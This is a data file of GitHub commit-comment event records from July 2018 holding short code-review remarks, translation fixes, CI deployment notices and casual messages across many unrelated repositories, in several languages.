{"id":"7975905947","type":"CommitCommentEvent","actor":{"login":"liaostr"},"repo":{"name":"liaostr/yapi"},"payload":{"comment":{"id":29732947,"position":null,"line":null,"path":null,"commit_id":"edf5627c7200bf5cea3c0464742405487a8249f4","created_at":"2018-07-17T10:50:56Z","updated_at":"2018-07-17T10:50:56Z","author_association":"OWNER","body":"update"}},"created_at":"2018-07-17T10:50:56Z"}
{"id":"7975914813","type":"CommitCommentEvent","actor":{"login":"Ruffio"},"repo":{"name":"netPark/node-openalpr"},"payload":{"comment":{"id":29732956,"position":null,"line":null,"path":null,"commit_id":"4ebbad23f47b4b5058dc094217e0211ff9790177","created_at":"2018-07-17T10:52:50Z","updated_at":"2018-07-17T10:52:50Z","author_association":"NONE","body":"What is holding back this PR?"}},"created_at":"2018-07-17T10:52:50Z"}
{"id":"7975920047","type":"CommitCommentEvent","actor":{"login":"hydra3333"},"repo":{"name":"hydra3333/ffmpeg-windows-build-helpers-withOpenCL"},"payload":{"comment":{"id":29732968,"position":null,"line":null,"path":null,"commit_id":"4f863317dd8de70723881da5dbfd7e7da8e4bd44","created_at":"2018-07-17T10:53:58Z","updated_at":"2018-07-17T10:53:58Z","author_association":"OWNER","body":"Sorry, no not --enable-d3d11va.\r\nYes I use loudnorm, it takes a while.\r\n"}},"created_at":"2018-07-17T10:53:58Z"}
{"id":"7975920959","type":"CommitCommentEvent","actor":{"login":"godo13405"},"repo":{"name":"godo13405/dragon-spellbook"},"payload":{"comment":{"id":29732973,"position":null,"line":null,"path":null,"commit_id":"cf96d7b1e86778c9c19877a5a984762ceed6d691","created_at":"2018-07-17T10:54:11Z","updated_at":"2018-07-17T10:54:11Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.bluemix.net/devops/toolchains/48c4c854-767b-47f7-b2ec-7f79e14cf35d?env_id=ibm%3Ayp%3Aeu-gb \"dragon-book\"): [Delivery Pipeline](https://console.bluemix.net/devops/pipelines/7ddab936-a781-49fa-99fc-742d790aea96?env_id=ibm%3Ayp%3Aeu-gb \"dragon-book\") deployed [dragon-spellbook](https://github.com/godo13405/dragon-spellbook/releases/tag/deploy-ibm-yp-eu-gb-UXCalibur-prod-20180717-105410 \"deploy-ibm-yp-eu-gb-UXCalibur-prod-20180717-105410\") to [prod](https://console.bluemix.net/apps/aaffb021-5482-4ff5-bc14-26c90db6686c?env_id=ibm:yp:eu-gb \"ibm:yp:eu-gb:UXCalibur:prod\"), including this commit"}},"created_at":"2018-07-17T10:54:11Z"}
{"id":"7975921765","type":"CommitCommentEvent","actor":{"login":"mr-koww"},"repo":{"name":"alex707/L1"},"payload":{"comment":{"id":29732975,"position":6,"line":6,"path":"3.rb","commit_id":"74a4fd1e725d80e17b710300975e6db815377e77","created_at":"2018-07-17T10:54:21Z","updated_at":"2018-07-17T10:54:21Z","author_association":"NONE","body":"Стороны могут быть не только целыми, но и дробными числами"}},"created_at":"2018-07-17T10:54:21Z"}
{"id":"7975922290","type":"CommitCommentEvent","actor":{"login":"myran2"},"repo":{"name":"AshamaneProject/AshamaneCore"},"payload":{"comment":{"id":29732976,"position":5,"line":727,"path":"src/server/game/Server/Protocol/Opcodes.cpp","commit_id":"9f1ec584c31498b2a68ae993e935d6b2c9ee9ea1","created_at":"2018-07-17T10:54:28Z","updated_at":"2018-07-17T10:54:28Z","author_association":"NONE","body":"Don't forget to change the Status from STATUS_UNHANDLED."}},"created_at":"2018-07-17T10:54:28Z"}
{"id":"7975922943","type":"CommitCommentEvent","actor":{"login":"mr-koww"},"repo":{"name":"alex707/L1"},"payload":{"comment":{"id":29732979,"position":4,"line":4,"path":"2.rb","commit_id":"74a4fd1e725d80e17b710300975e6db815377e77","created_at":"2018-07-17T10:54:36Z","updated_at":"2018-07-17T10:54:36Z","author_association":"NONE","body":"Значения могут быть дробными"}},"created_at":"2018-07-17T10:54:36Z"}
{"id":"7975923665","type":"CommitCommentEvent","actor":{"login":"mr-koww"},"repo":{"name":"alex707/L1"},"payload":{"comment":{"id":29732981,"position":null,"line":null,"path":null,"commit_id":"74a4fd1e725d80e17b710300975e6db815377e77","created_at":"2018-07-17T10:54:45Z","updated_at":"2018-07-17T10:54:45Z","author_association":"NONE","body":"Привет, что нужно поправить:\r\n1. Integer() не стоит использовать, лучше короче - to_i\r\n2. Правильно настроить табы в своем редакторе\r\nТакже рекомендую ознакомиться с [ruby style guide](https://github.com/rubocop-hq/ruby-style-guide)"}},"created_at":"2018-07-17T10:54:45Z"}
{"id":"7975926801","type":"CommitCommentEvent","actor":{"login":"harhail666"},"repo":{"name":"OpenKore/openkore"},"payload":{"comment":{"id":29732985,"position":null,"line":null,"path":null,"commit_id":"1b8e86b864c8e038e1d7bab9c6c3e25c7ab5b719","created_at":"2018-07-17T10:55:27Z","updated_at":"2018-07-17T10:55:27Z","author_association":"NONE","body":"do you have ROPH  packet tables and keys? Thanks in advance"}},"created_at":"2018-07-17T10:55:27Z"}
{"id":"7975928796","type":"CommitCommentEvent","actor":{"login":"Ruffio"},"repo":{"name":"netPark/node-openalpr"},"payload":{"comment":{"id":29732988,"position":null,"line":null,"path":null,"commit_id":"6737c3c30fb1c5ce83e92c485f596713d13060ad","created_at":"2018-07-17T10:55:51Z","updated_at":"2018-07-17T10:55:51Z","author_association":"NONE","body":"What will it take to get this PR merged?"}},"created_at":"2018-07-17T10:55:51Z"}
{"id":"7975930369","type":"CommitCommentEvent","actor":{"login":"VeraUlitina"},"repo":{"name":"AndreyKozhevnikov/how-to-create-a-propertyeditor-based-on-the-xtrarichedit-control-e1509"},"payload":{"comment":{"id":29732991,"position":7,"line":2,"path":"Readme.md","commit_id":"8d9a88b996d09aef5ac6444b676e25efb19dd4d3","created_at":"2018-07-17T10:56:12Z","updated_at":"2018-07-17T10:56:12Z","author_association":"NONE","body":"... integrates the ... Editor **and allows** end-users to create, load, print,..."}},"created_at":"2018-07-17T10:56:12Z"}
{"id":"7975931763","type":"CommitCommentEvent","actor":{"login":"anandopt"},"repo":{"name":"anandopt/cLSO"},"payload":{"comment":{"id":29732993,"position":null,"line":null,"path":null,"commit_id":"6f5fe323cb424a6a575923b4907c373c088315b2","created_at":"2018-07-17T10:56:30Z","updated_at":"2018-07-17T10:56:30Z","author_association":"OWNER","body":"Input is taken from file \"Input file.xlsx\" in input folder\r\nOutput is stored in \"Price evolution.xslx\" in output folder."}},"created_at":"2018-07-17T10:56:30Z"}
{"id":"7975935625","type":"CommitCommentEvent","actor":{"login":"jac18281828"},"repo":{"name":"conversant/disruptor"},"payload":{"comment":{"id":29732998,"position":null,"line":null,"path":null,"commit_id":"88cae3eafe996fd70775c0cc9e607a74ab3d0970","created_at":"2018-07-17T10:57:20Z","updated_at":"2018-07-17T10:57:20Z","author_association":"COLLABORATOR","body":"Ah, yes, that makes sense!"}},"created_at":"2018-07-17T10:57:20Z"}
{"id":"7975937265","type":"CommitCommentEvent","actor":{"login":"ronai22"},"repo":{"name":"green-fox-academy/ronai22"},"payload":{"comment":{"id":29733001,"position":6,"line":6,"path":"week-08/day-05/new-reddit/src/main/java/com/greenfoxacademy/newreddit/models/Post.java","commit_id":"c1820e29d6b9f52ebe1435a1510a478486a5c319","created_at":"2018-07-17T10:57:42Z","updated_at":"2018-07-17T10:57:42Z","author_association":"COLLABORATOR","body":"Thank you, I corrected the empty lines!"}},"created_at":"2018-07-17T10:57:42Z"}
{"id":"7975938929","type":"CommitCommentEvent","actor":{"login":"jukkar"},"repo":{"name":"aescolar/zephyr"},"payload":{"comment":{"id":29733004,"position":67,"line":148,"path":"boards/posix/native_posix/cmdline.c","commit_id":"b68fd79426520ea9452699b6046a8a225058802b","created_at":"2018-07-17T10:58:05Z","updated_at":"2018-07-17T10:58:05Z","author_association":"NONE","body":"I am not following this \"parts per 1\" concept here. In next sentence you talk about ppm which means parts per million, shouldn't we say here that too?"}},"created_at":"2018-07-17T10:58:05Z"}
{"id":"7975939130","type":"CommitCommentEvent","actor":{"login":"gustavovalverde"},"repo":{"name":"odoo/odoo"},"payload":{"comment":{"id":29733005,"position":null,"line":null,"path":null,"commit_id":"eb2f104e441677e9f8b39e20ab99cf373d5c7c5c","created_at":"2018-07-17T10:58:08Z","updated_at":"2018-07-17T10:58:08Z","author_association":"CONTRIBUTOR","body":"Hallelujah ❤️ "}},"created_at":"2018-07-17T10:58:08Z"}
{"id":"7975939971","type":"CommitCommentEvent","actor":{"login":"godo13405"},"repo":{"name":"godo13405/dragon-spellbook"},"payload":{"comment":{"id":29733006,"position":null,"line":null,"path":null,"commit_id":"9469724720df11b103d405b12f7424546751a4ce","created_at":"2018-07-17T10:58:19Z","updated_at":"2018-07-17T10:58:19Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.bluemix.net/devops/toolchains/48c4c854-767b-47f7-b2ec-7f79e14cf35d?env_id=ibm%3Ayp%3Aeu-gb \"dragon-book\"): [Delivery Pipeline](https://console.bluemix.net/devops/pipelines/7ddab936-a781-49fa-99fc-742d790aea96?env_id=ibm%3Ayp%3Aeu-gb \"dragon-book\") deployed [dragon-spellbook](https://github.com/godo13405/dragon-spellbook/releases/tag/deploy-ibm-yp-eu-gb-UXCalibur-prod-20180717-105818 \"deploy-ibm-yp-eu-gb-UXCalibur-prod-20180717-105818\") to [prod](https://console.bluemix.net/apps/aaffb021-5482-4ff5-bc14-26c90db6686c?env_id=ibm:yp:eu-gb \"ibm:yp:eu-gb:UXCalibur:prod\"), including this commit"}},"created_at":"2018-07-17T10:58:19Z"}
{"id":"7975943103","type":"CommitCommentEvent","actor":{"login":"OzzAxoy"},"repo":{"name":"OzzAxoy/04_BattleTank"},"payload":{"comment":{"id":29733016,"position":null,"line":null,"path":null,"commit_id":"be81a319dcec79194cfc9e6fc1efffb8f72ecdcd","created_at":"2018-07-17T10:59:00Z","updated_at":"2018-07-17T10:59:00Z","author_association":"OWNER","body":"BT01 Intro, Notes & Assets"}},"created_at":"2018-07-17T10:59:00Z"}
{"id":"7975955313","type":"CommitCommentEvent","actor":{"login":"ImaginationWork"},"repo":{"name":"ImaginationWork/TeamTalk"},"payload":{"comment":{"id":29733045,"position":null,"line":null,"path":null,"commit_id":"3a994e45f7ff50bd78a3000df601dbafce8e038f","created_at":"2018-07-17T11:01:32Z","updated_at":"2018-07-17T11:01:32Z","author_association":"OWNER","body":"finally, resolve #31 "}},"created_at":"2018-07-17T11:01:32Z"}
{"id":"7975964829","type":"CommitCommentEvent","actor":{"login":"sparrowDom"},"repo":{"name":"OriginProtocol/origin-website"},"payload":{"comment":{"id":29733055,"position":14,"line":754,"path":"translations/sl/LC_MESSAGES/messages.pot","commit_id":"d0f183f660c82de4eac7b23f03f1f10c1352c9f5","created_at":"2018-07-17T11:03:40Z","updated_at":"2018-07-17T11:03:40Z","author_association":"NONE","body":"@wanderingstan  The first sentance translates \"full stack\"  and \"scalable\" incorrectly. It would be better like this: \r\n\r\nGagandeep je razvijalec spletnih aplikacij z več kot štirimi leti izkušenj, pri večih startup podjetjih. Specializiral se je za izgradnjo skalabilnih aplikacij za podjetja."}},"created_at":"2018-07-17T11:03:40Z"}
{"id":"7975967225","type":"CommitCommentEvent","actor":{"login":"jukkar"},"repo":{"name":"aescolar/zephyr"},"payload":{"comment":{"id":29733061,"position":92,"line":126,"path":"boards/posix/native_posix/timer_model.c","commit_id":"b68fd79426520ea9452699b6046a8a225058802b","created_at":"2018-07-17T11:04:12Z","updated_at":"2018-07-17T11:04:12Z","author_association":"NONE","body":"Would it possible to track time in nanosecond scale? It is a bit problematic for gptp support (which uses nanosecond scale) if the nanoseconds are always 0 as we would need to convert the us to ns for gptp."}},"created_at":"2018-07-17T11:04:12Z"}
{"id":"7975969078","type":"CommitCommentEvent","actor":{"login":"Kowshik890"},"repo":{"name":"Kowshik890/Home"},"payload":{"comment":{"id":29733064,"position":null,"line":null,"path":null,"commit_id":"e9cebc8ed12c23944e9165956fcfebd3cc8357fe","created_at":"2018-07-17T11:04:35Z","updated_at":"2018-07-17T11:04:35Z","author_association":"OWNER","body":"hom"}},"created_at":"2018-07-17T11:04:35Z"}
{"id":"7975971778","type":"CommitCommentEvent","actor":{"login":"aafemt"},"repo":{"name":"FirebirdSQL/firebird"},"payload":{"comment":{"id":29733068,"position":5,"line":66,"path":"src/msgs/messages2.sql","commit_id":"32ca23b4fc17d01c09e6400a41e313163ee4559a","created_at":"2018-07-17T11:05:12Z","updated_at":"2018-07-17T11:05:12Z","author_association":"CONTRIBUTOR","body":"Without proper versioning of msg file it is a really bad idea to change existing messages. Either add a new message or add a secondary code."}},"created_at":"2018-07-17T11:05:12Z"}
{"id":"7975972640","type":"CommitCommentEvent","actor":{"login":"GusevBoy"},"repo":{"name":"GusevBoy/-project666"},"payload":{"comment":{"id":29733071,"position":1,"line":1,"path":"illdy/BEM/NewDocument.txt","commit_id":"fea871edc1e9b863f7053bff9ef854e1b732c9dc","created_at":"2018-07-17T11:05:25Z","updated_at":"2018-07-17T11:05:25Z","author_association":"OWNER","body":"No test? "}},"created_at":"2018-07-17T11:05:25Z"}
{"id":"7975978753","type":"CommitCommentEvent","actor":{"login":"Batodalaev"},"repo":{"name":"Batodalaev/movavi_test"},"payload":{"comment":{"id":29733078,"position":null,"line":null,"path":null,"commit_id":"cf9bb2fa4bd661d4e40ba74a435bcf92aba9dab8","created_at":"2018-07-17T11:06:44Z","updated_at":"2018-07-17T11:06:44Z","author_association":"OWNER","body":"QImage заменен на QPixmap, потому что QLabel принимает QPixmap"}},"created_at":"2018-07-17T11:06:44Z"}
{"id":"7975983530","type":"CommitCommentEvent","actor":{"login":"GusevBoy"},"repo":{"name":"GusevBoy/-project666"},"payload":{"comment":{"id":29733087,"position":null,"line":null,"path":null,"commit_id":"fea871edc1e9b863f7053bff9ef854e1b732c9dc","created_at":"2018-07-17T11:07:47Z","updated_at":"2018-07-17T11:07:47Z","author_association":"OWNER","body":"qweqwe"}},"created_at":"2018-07-17T11:07:47Z"}
{"id":"7975990580","type":"CommitCommentEvent","actor":{"login":"clman94"},"repo":{"name":"HHSProgrammingClub/smash-my-buttons"},"payload":{"comment":{"id":29733097,"position":14,"line":33,"path":"src/Projectile.java","commit_id":"b25b417191e17d83a2f4dc3b6f29c0553e00af2a","created_at":"2018-07-17T11:09:18Z","updated_at":"2018-07-17T11:09:18Z","author_association":"CONTRIBUTOR","body":"Yes."}},"created_at":"2018-07-17T11:09:18Z"}
{"id":"7975992291","type":"CommitCommentEvent","actor":{"login":"Samylankey"},"repo":{"name":"Samylankey/sapayapan1"},"payload":{"comment":{"id":29733100,"position":1,"line":1,"path":"README.md","commit_id":"6cd109e3c3dac42516e3b04e9994f4bd2fe385b8","created_at":"2018-07-17T11:09:42Z","updated_at":"2018-07-17T11:09:42Z","author_association":"OWNER","body":"Yes"}},"created_at":"2018-07-17T11:09:42Z"}
{"id":"7975994920","type":"CommitCommentEvent","actor":{"login":"Cacodemon345"},"repo":{"name":"coelckers/gzdoom"},"payload":{"comment":{"id":29733105,"position":null,"line":null,"path":null,"commit_id":"7817e6a7b250378361e7abe191a81fe984a78aa2","created_at":"2018-07-17T11:10:18Z","updated_at":"2018-07-17T11:10:18Z","author_association":"CONTRIBUTOR","body":"Be ready for other problems like this one, Graf. Vulkan is said not to be backwards compatible with OpenGL and this is one of the places where it is proven."}},"created_at":"2018-07-17T11:10:18Z"}
{"id":"7976018864","type":"CommitCommentEvent","actor":{"login":"danielnaber"},"repo":{"name":"languagetool-org/languagetool"},"payload":{"comment":{"id":29733137,"position":5,"line":43,"path":"languagetool-gui-commons/src/main/java/org/languagetool/gui/Configuration.java","commit_id":"96aa70a5111715ce848f9d2567b949f869c806fa","created_at":"2018-07-17T11:15:32Z","updated_at":"2018-07-17T11:15:32Z","author_association":"MEMBER","body":"> For text-level rules it's not optimal (nicely spoken) because at a change of on paragraph the whole text has to be checked by the text-level rules.\r\n\r\nCould you give an example of the performance? I'd think that checking a long text should be fast if using *only* the text-level rules?"}},"created_at":"2018-07-17T11:15:32Z"}
{"id":"7976022099","type":"CommitCommentEvent","actor":{"login":"TheQwertiest"},"repo":{"name":"TheQwertiest/foo-jscript-panel"},"payload":{"comment":{"id":29733152,"position":null,"line":null,"path":null,"commit_id":"8a41c524a9c3c16c466204fde81c5c108975310b","created_at":"2018-07-17T11:16:15Z","updated_at":"2018-07-17T11:16:15Z","author_association":"OWNER","body":"Thanks!\r\n\r\n> obviously that works in JScript Panel... dunno about yours! \r\n\r\nWe'll find out soon =)"}},"created_at":"2018-07-17T11:16:15Z"}
{"id":"7976022860","type":"CommitCommentEvent","actor":{"login":"ThePiGuy0"},"repo":{"name":"MotoZ-2016/android_vendor_motorola_griffin"},"payload":{"comment":{"id":29733155,"position":null,"line":null,"path":null,"commit_id":"8d0b179e22f0170e6a78ef15c59e2792209da43a","created_at":"2018-07-17T11:16:25Z","updated_at":"2018-07-17T11:16:25Z","author_association":"NONE","body":"@erfanoabdi would it be possible for you to explain how you compiled the N protobuf with 3.0.0 headers (sorry if it's a silly question - I'm trying to do it myself and I can't currently)"}},"created_at":"2018-07-17T11:16:25Z"}
{"id":"7976023922","type":"CommitCommentEvent","actor":{"login":"flyingleafe"},"repo":{"name":"DisciplinaOU/disciplina"},"payload":{"comment":{"id":29733159,"position":92,"line":262,"path":"src/Dscp/Crypto/MerkleTree.hs","commit_id":"e99cd3fe494bd21c6dd3d0800b9e79733e32f676","created_at":"2018-07-17T11:16:39Z","updated_at":"2018-07-17T11:16:39Z","author_association":"MEMBER","body":"@Heimdell what? no, `plugs` can be smaller than an empty mtree, and it will be most times. The idea is to fill only those leaves of empty merkle tree which are included in `plugs`, leaving all others pruned."}},"created_at":"2018-07-17T11:16:39Z"}
{"id":"7976025101","type":"CommitCommentEvent","actor":{"login":"mdshahbaj"},"repo":{"name":"mdshahbaj/MyFirstGITProject"},"payload":{"comment":{"id":29733161,"position":null,"line":null,"path":null,"commit_id":"931a618a69b3e92d0f90afe470d1eaf6704cf866","created_at":"2018-07-17T11:16:54Z","updated_at":"2018-07-17T11:16:54Z","author_association":"OWNER","body":"Please remove your name, doest not look gud."}},"created_at":"2018-07-17T11:16:54Z"}
{"id":"7976026271","type":"CommitCommentEvent","actor":{"login":"patrys"},"repo":{"name":"mirumee/saleor"},"payload":{"comment":{"id":29733170,"position":14,"line":1134,"path":"tests/api/test_product.py","commit_id":"80c0181a8c2a4db2fa9a3c7c825bebd6e432a38a","created_at":"2018-07-17T11:17:09Z","updated_at":"2018-07-17T11:17:09Z","author_association":"MEMBER","body":"Not sure this is needed. And if it was I think `!=` would be preferred."}},"created_at":"2018-07-17T11:17:09Z"}
{"id":"7976029936","type":"CommitCommentEvent","actor":{"login":"ndevenish"},"repo":{"name":"dials/dials"},"payload":{"comment":{"id":29733184,"position":null,"line":null,"path":null,"commit_id":"fc02dea019b9932e6478eb7e1ec92466534a227a","created_at":"2018-07-17T11:18:01Z","updated_at":"2018-07-17T11:18:01Z","author_association":"MEMBER","body":"I know I'm a little late on this, but is the intention to eventually turn this on by default? If it's just for DUI, couldn't DUI just run it twice...?"}},"created_at":"2018-07-17T11:18:01Z"}
{"id":"7976031136","type":"CommitCommentEvent","actor":{"login":"wol-soft"},"repo":{"name":"php/php-src"},"payload":{"comment":{"id":29733188,"position":14,"line":3976,"path":"ext/standard/array.c","commit_id":"50516a6e1f357f63324ec76e26623f2a7185bd4f","created_at":"2018-07-17T11:18:17Z","updated_at":"2018-07-17T11:18:17Z","author_association":"NONE","body":"Thanks for the notes with explanations @nikic and for the merge @cmb69 "}},"created_at":"2018-07-17T11:18:17Z"}
{"id":"7976032069","type":"CommitCommentEvent","actor":{"login":"superna9999"},"repo":{"name":"superna9999/linux"},"payload":{"comment":{"id":29733192,"position":26,"line":1555,"path":"drivers/clk/meson/gxbb.c","commit_id":"91019aa6ce723b3374aa996b834dde0c83e0d8f7","created_at":"2018-07-17T11:18:30Z","updated_at":"2018-07-17T11:18:30Z","author_association":"OWNER","body":"Ok"}},"created_at":"2018-07-17T11:18:30Z"}
{"id":"7976033664","type":"CommitCommentEvent","actor":{"login":"xPaw"},"repo":{"name":"SteamRE/SteamKit"},"payload":{"comment":{"id":29733194,"position":null,"line":null,"path":null,"commit_id":"6593190091bc32d5deb7161a1d50588217faefa6","created_at":"2018-07-17T11:18:51Z","updated_at":"2018-07-17T11:18:51Z","author_association":"CONTRIBUTOR","body":"The proto is generated by https://github.com/SteamDatabase/SteamTracking/blob/master/protobufdumper.js"}},"created_at":"2018-07-17T11:18:51Z"}
{"id":"7976034531","type":"CommitCommentEvent","actor":{"login":"superna9999"},"repo":{"name":"superna9999/linux"},"payload":{"comment":{"id":29733197,"position":197,"line":1726,"path":"drivers/clk/meson/gxbb.c","commit_id":"91019aa6ce723b3374aa996b834dde0c83e0d8f7","created_at":"2018-07-17T11:19:03Z","updated_at":"2018-07-17T11:19:03Z","author_association":"OWNER","body":"C’est pas faux..."}},"created_at":"2018-07-17T11:19:03Z"}
{"id":"7976036588","type":"CommitCommentEvent","actor":{"login":"superna9999"},"repo":{"name":"superna9999/linux"},"payload":{"comment":{"id":29733199,"position":471,"line":2000,"path":"drivers/clk/meson/gxbb.c","commit_id":"91019aa6ce723b3374aa996b834dde0c83e0d8f7","created_at":"2018-07-17T11:19:32Z","updated_at":"2018-07-17T11:19:32Z","author_association":"OWNER","body":"Ok"}},"created_at":"2018-07-17T11:19:32Z"}
{"id":"7976037751","type":"CommitCommentEvent","actor":{"login":"janstary"},"repo":{"name":"columbia-irt/rtptools"},"payload":{"comment":{"id":29733206,"position":null,"line":null,"path":null,"commit_id":"5558ad01fbf26a8d40bc86f6b53dd030064c724e","created_at":"2018-07-17T11:19:48Z","updated_at":"2018-07-17T11:19:48Z","author_association":"CONTRIBUTOR","body":"The hardwired `/usr/local/bin` does not seem right.\r\nShouldn't `prefix` be set to `/usr/local` and then used?"}},"created_at":"2018-07-17T11:19:48Z"}
{"id":"7976038548","type":"CommitCommentEvent","actor":{"login":"sparrowDom"},"repo":{"name":"OriginProtocol/origin-website"},"payload":{"comment":{"id":29733209,"position":14,"line":746,"path":"translations/sl/LC_MESSAGES/messages.pot","commit_id":"cc9703d766c7a027efd093d72f4abd034f08da87","created_at":"2018-07-17T11:19:59Z","updated_at":"2018-07-17T11:19:59Z","author_association":"NONE","body":"@wanderingstan Just correcting \"full stack\", \"assembly programming\" and making sentence flow better. Also changing NGO to Slovenian word that people are more accustomed to:  \r\n\r\nDaniel je poliglot in razvijalec spletnih aplikacij. Delal je na večih projektih od programiranja v zbirnem jeziku, do postavljanja arhitekture sistemov, ki sledijo miliardam dolarjev potrošnje nevladnih organizacij."}},"created_at":"2018-07-17T11:19:59Z"}
{"id":"7976040135","type":"CommitCommentEvent","actor":{"login":"SpectrixOfficial"},"repo":{"name":"SpectrumDevs/SpectrumDevs.github.io"},"payload":{"comment":{"id":29733212,"position":null,"line":null,"path":null,"commit_id":"d502c87b1e781d6b5c84a2293487f27a33b21a21","created_at":"2018-07-17T11:20:20Z","updated_at":"2018-07-17T11:20:20Z","author_association":"CONTRIBUTOR","body":"_oof_"}},"created_at":"2018-07-17T11:20:20Z"}
{"id":"7976040175","type":"CommitCommentEvent","actor":{"login":"kamidev"},"repo":{"name":"surveyjs/surveyjs"},"payload":{"comment":{"id":29733213,"position":null,"line":null,"path":null,"commit_id":"f2af3a10d3fcae4f506c7042fdc53ce55c5d8506","created_at":"2018-07-17T11:20:20Z","updated_at":"2018-07-17T11:20:20Z","author_association":"NONE","body":"Looking forward to test this one! \r\n\r\nHowever, one of two Travis builds currently fail, there was a problem with Chrome stable."}},"created_at":"2018-07-17T11:20:20Z"}
{"id":"7976040361","type":"CommitCommentEvent","actor":{"login":"ShmielB"},"repo":{"name":"Compuskills-Jerusalem/shuk-routing"},"payload":{"comment":{"id":29733214,"position":null,"line":null,"path":null,"commit_id":"c0bcf0ea731d8e2efc34797c2021a7cb4d029f89","created_at":"2018-07-17T11:20:22Z","updated_at":"2018-07-17T11:20:22Z","author_association":"COLLABORATOR","body":"@ykosbie \r\n i would like to know if the JavaScript / JQuery code  in the  ShukRouting/ShukRouting.Mvc/JavaScripts/JavaScript.js file is a good way of handling the event and the Http request .   "}},"created_at":"2018-07-17T11:20:22Z"}
{"id":"7976041754","type":"CommitCommentEvent","actor":{"login":"superna9999"},"repo":{"name":"superna9999/linux"},"payload":{"comment":{"id":29733216,"position":526,"line":2055,"path":"drivers/clk/meson/gxbb.c","commit_id":"91019aa6ce723b3374aa996b834dde0c83e0d8f7","created_at":"2018-07-17T11:20:43Z","updated_at":"2018-07-17T11:20:43Z","author_association":"OWNER","body":"Oui, et non, il y a une autre source cts_tcon mais pas utilisée en mode HDMI, mais on pourra créer une liste séparée plus tard si besoin"}},"created_at":"2018-07-17T11:20:43Z"}
{"id":"7976044386","type":"CommitCommentEvent","actor":{"login":"jido2015"},"repo":{"name":"jido2015/ChefCook"},"payload":{"comment":{"id":29733222,"position":null,"line":null,"path":null,"commit_id":"29bdb7fec8f4e6b61bd4e6f661cb6cf31b6dba18","created_at":"2018-07-17T11:21:17Z","updated_at":"2018-07-17T11:21:17Z","author_association":"OWNER","body":"Library package contains code for ImageSlider."}},"created_at":"2018-07-17T11:21:17Z"}
{"id":"7976044702","type":"CommitCommentEvent","actor":{"login":"muglug"},"repo":{"name":"vimeo/psalm"},"payload":{"comment":{"id":29733224,"position":35,"line":653,"path":"src/Psalm/Type.php","commit_id":"1e54c61fde8c4db15ddb4ec96ae6cd1c48270eb9","created_at":"2018-07-17T11:21:22Z","updated_at":"2018-07-17T11:21:22Z","author_association":"MEMBER","body":"Look harder - the first var is `$i`, the second is `$l`"}},"created_at":"2018-07-17T11:21:22Z"}
{"id":"7976047132","type":"CommitCommentEvent","actor":{"login":"superna9999"},"repo":{"name":"superna9999/linux"},"payload":{"comment":{"id":29733234,"position":605,"line":2134,"path":"drivers/clk/meson/gxbb.c","commit_id":"91019aa6ce723b3374aa996b834dde0c83e0d8f7","created_at":"2018-07-17T11:21:53Z","updated_at":"2018-07-17T11:21:53Z","author_association":"OWNER","body":"Bah tant que le driver DRM n’utilise pas CCf on pourra pas y couper sinon CCF va couper toutes les gates au boot"}},"created_at":"2018-07-17T11:21:53Z"}
{"id":"7976047183","type":"CommitCommentEvent","actor":{"login":"JustArchi"},"repo":{"name":"SteamRE/SteamKit"},"payload":{"comment":{"id":29733235,"position":null,"line":null,"path":null,"commit_id":"6593190091bc32d5deb7161a1d50588217faefa6","created_at":"2018-07-17T11:21:54Z","updated_at":"2018-07-17T11:21:54Z","author_association":"CONTRIBUTOR","body":"This is lovely, thank you both @xPaw @yaakov-h ❤️"}},"created_at":"2018-07-17T11:21:54Z"}
{"id":"7976047908","type":"CommitCommentEvent","actor":{"login":"ddt-mentor"},"repo":{"name":"fujita0622/-WriteTypeSqlDrill"},"payload":{"comment":{"id":29733236,"position":13,"line":13,"path":"cap3/3_5_2.sql","commit_id":"bc940487d594a4cbba90d1063cfe3c8e1789fdf0","created_at":"2018-07-17T11:22:04Z","updated_at":"2018-07-17T11:22:04Z","author_association":"COLLABORATOR","body":"成田\r\n解答位置がずれてしまっています。\r\n8行目の「；」からこの行までが15行目の下にくるのかと思います。"}},"created_at":"2018-07-17T11:22:04Z"}
{"id":"7976047926","type":"CommitCommentEvent","actor":{"login":"techthreads"},"repo":{"name":"ThreadsStyling/tslint"},"payload":{"comment":{"id":29733237,"position":null,"line":null,"path":null,"commit_id":"d862bb92bb91f8a364c8d1fdb0e3982766bbdd27","created_at":"2018-07-17T11:22:04Z","updated_at":"2018-07-17T11:22:04Z","author_association":"NONE","body":"Build version: __`3.2.0-master.14`__ :crossed_fingers: [`master`](https://github.com/ThreadsStyling/tslint/tree/master) on [*CircleCI*](https://circleci.com/gh/ThreadsStyling/tslint/14) :tada:"}},"created_at":"2018-07-17T11:22:04Z"}
{"id":"7976049400","type":"CommitCommentEvent","actor":{"login":"cristealucian97"},"repo":{"name":"cristealucian97/homeautomationbeta"},"payload":{"comment":{"id":29733241,"position":null,"line":null,"path":null,"commit_id":"cee078dc593b2b638bd1e4bda5b77f038c8617da","created_at":"2018-07-17T11:22:22Z","updated_at":"2018-07-17T11:22:22Z","author_association":"OWNER","body":"nice!"}},"created_at":"2018-07-17T11:22:22Z"}
{"id":"7976050880","type":"CommitCommentEvent","actor":{"login":"danielnaber"},"repo":{"name":"languagetool-org/languagetool"},"payload":{"comment":{"id":29733245,"position":5,"line":300,"path":"languagetool-office-extension/src/main/java/org/languagetool/openoffice/LOFlatParagraph.java","commit_id":"9b41c40f8966cc88c36acc056ea5ee0d95e811f0","created_at":"2018-07-17T11:22:41Z","updated_at":"2018-07-17T11:22:41Z","author_association":"MEMBER","body":"This seems misleading, the method doesn't return anything?"}},"created_at":"2018-07-17T11:22:41Z"}
{"id":"7976053140","type":"CommitCommentEvent","actor":{"login":"ielizaga"},"repo":{"name":"Tylarb/PCF-Support-Bot"},"payload":{"comment":{"id":29733250,"position":null,"line":null,"path":null,"commit_id":"45aa6f84b38c33030aabc5d393c5ecc015c88e9c","created_at":"2018-07-17T11:23:13Z","updated_at":"2018-07-17T11:23:13Z","author_association":"CONTRIBUTOR","body":"LGTM"}},"created_at":"2018-07-17T11:23:13Z"}
{"id":"7976055901","type":"CommitCommentEvent","actor":{"login":"komalchandu"},"repo":{"name":"zingpython/Intro_python_1"},"payload":{"comment":{"id":29733253,"position":33,"line":33,"path":"README.md","commit_id":"1dc496d70bd9044be3fe5a351fded4dbdf54bee2","created_at":"2018-07-17T11:23:51Z","updated_at":"2018-07-17T11:23:51Z","author_association":"NONE","body":"i need this proper python program can anyone help me? if you have please email it to komalchandu111@gmail.com"}},"created_at":"2018-07-17T11:23:51Z"}
